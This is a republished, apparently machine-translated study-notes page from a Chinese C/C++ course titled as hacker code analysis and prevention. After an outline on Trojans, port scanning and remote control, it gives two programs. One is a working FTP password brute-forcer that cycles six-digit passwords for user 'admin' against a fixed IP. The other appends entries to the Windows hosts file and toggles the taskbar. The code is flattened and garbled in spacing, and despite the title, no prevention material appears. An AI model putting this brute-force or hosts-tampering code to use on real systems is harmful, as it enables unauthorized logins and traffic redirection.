C/c ++ Open Course Study Notes-Hacker code analysis and prevention, and wisdom podcast Study Notes

Source: Internet
Author: User

C/c ++ Open Course Study Notes-Hacker code analysis and prevention, and wisdom podcast Study Notes

Hacker code Analysis and Prevention notes


[Course Introduction]

C/C ++ language is similar to the underlying computer language except assembly. Currently, mainstream operating systems such as windows, linux, iOS, and Android are all written in C/C ++, therefore, many viruses and Trojans are implemented using C/C ++. The purpose of the course is to reveal the principle and Protection of Trojans and various remote control software in C language.

Course knowledge point]

1. Trojan intrusion into the system;

2. Analysis of key behaviors after Trojans intrude into the host target;

3. Trusted port and port scanning technology;

4. Remote control implementation code;

5. Use TCP, UDP, and firewall traversal technologies in malicious code;

6. 360 Network Security Protection implementation principle.

# Include <stdio. h> # include <string. h> # define CONTENT "open % s \ nuser \ n % s \ nbye \ n" int write_file (const char * ip, const char * user, const char * passwd) {FILE * p = fopen ("a.txt", "w"); if (p) {char buf [1024] = {0}; sprintf (buf, CONTENT, ip, user, passwd); fputs (buf, p); fclose (p); return 0; // If successful, return 0} return-1; // failure, -1} int main () {int I; for (I = 0; I <1000000; I ++) // assume that all passwords are composed of numbers {char pass [100] = {0}; spri Ntf (pass, "% 06d", I); // format it as a string if (write_file ("192.168.101.138", "admin", pass) = 0) {FILE * p = _ popen ("ftp-n-s: a.txt", "r"); while (! Feof (p) {char buf [1024] = {0}; fgets (buf, sizeof (buf), p); if (strncmp (buf, "230", 3) = 0) // Based on the returned value, 230 indicates success. {printf ("pass: % s \ n", pass); return 0 ;}} _ pclose (p) ;}} return 0 ;}


Function:

// Lockmask. cpp: defines the entry point of the application. // # Include "stdafx. h "# include" lockmask. h "// function/* modify the application icon vs: Replace the project name. ico file QT:. find an image. ico, whose name is changed to myapp. icob. create a text document myapp. rc. Add IDI_ICON1 icon discardable "myapp. ico "c. in myapp. add RC_FILE = myapp to the pro file. rc. After the statement is regenerated, the modification is successful. * // * The vs2013 argument does not need to be dependent on the library, projects compatible with xp -- properties -- configuration properties -- General -- platform tool set -- windwos xp project -- properties -- configuration properties -- c/c ++ -- code generation -- Runtime Library -- Multithreading (/MT ). */# include "stdafx. h "# include <stdio. h> # include <string. h> # include <Windows. h> # include <ShellAPI. h> # pragma warning (disable: 4996) void getWinVersion () // get win version {OSVERSIONINFO a;. dwOSVersionInfoSize = si Zeof (a); GetVersionEx (& a);} int setHosts (const char * IP, const char * domain) // modify the hosts file {char s [100] = {0}; GetSystemDirectoryA (s, sizeof (s )); // obtain the windows System directory char path [100] = {0}; sprintf (path, "% s \ % s", s, "\ drivers \ etc \ hosts"); char content [1024] = {0}; sprintf (content, "% s", IP, domain ); FILE * p = fopen (path, "a"); // open the hosts FILE if (p) {fputs (content, p); fclose (p); return 0 ;} return-1;} HWND getTas K () // obtain the taskbar handle {typedef HWND (WINAPI * PROCGETTASKMANWND) (void); // What is an HWND func (); Type function pointer PROCGETTASKMANWND GetTaskmanWindow; // define the function pointer variable HMODULE hUser32 = GetModuleHandleA ("user32"); // reference the user32.dll library if (! HUser32) return NULL; GetTaskmanWindow = (PROCGETTASKMANWND) GetProcAddress (hUser32, "GetTaskmanWindow"); if (! GetTaskmanWindow) return NULL; HWND h = GetTaskmanWindow (); return GetParent (h);} int APIENTRY _ tWinMain (_ In _ HINSTANCE hInstance, _ In_opt _ HINSTANCE hPrevInstance, _ In _ LPTSTR lpCmdLine, _ In _ int nCmdShow) {HWND h = getTask (); // EnableWindow (h, false ); // set the taskbar to disabled EnableWindow (h, true); // set the taskbar to available return 0 ;}



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.